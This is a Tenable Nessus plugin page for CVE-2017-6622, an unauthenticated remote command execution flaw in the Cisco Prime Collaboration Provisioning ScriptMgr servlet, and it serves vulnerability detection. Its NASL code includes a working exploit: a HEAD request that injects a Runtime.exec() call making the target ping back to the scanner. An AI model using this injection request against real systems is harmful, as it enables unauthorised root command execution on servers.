Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE

2017-07-13T00:00:00
ID CISCO_PRIME_CP_CVE-2017-6622.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(101531);
  script_version("1.5");
  script_cvs_date("Date: 2018/11/15 20:50:21");

  script_cve_id("CVE-2017-6622");
  script_bugtraq_id(98520);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
  script_xref(name:"ZDI", value:"ZDI-17-445");

  script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
  script_summary(english:"Attempts to perform a remote command injection.");

  script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");

  script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
  script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Make sure pcp is detected
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");

port = get_http_port(default:443);

# Vulnerable ScriptMgr servlet is reached through mod_jk 
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}

pat = SCRIPT_NAME;
if(strlen(pat) > 16)
  pat = substr(pat, 0, 15);
  
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + this_host();
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
method = "HEAD";
res = http_send_recv3(
  method        : method,
  item          : uri,
  port          : port,
  exit_on_fail  : TRUE
);

if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
  filter = "icmp and src " + get_host_ip() + " and dst " + this_host()  +
    " and icmp[icmptype] = icmp-echo";
  bpf = bpf_open(filter);
  if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");

  timeout = 5;
  t  = unixtime();
  repeat
  {
    frame = bpf_next(bpf:bpf);
    # ping back seen: cmd injection succeeded !
    if (frame && pat >< frame)
    {
      vuln = TRUE; 
      break; 
    }  
  }until(unixtime() - t > timeout);

  bpf_close(bpf);
}

if(vuln)
{
  req = http_last_sent_request(); 
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    request     : make_list(req)
  );
}
else
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}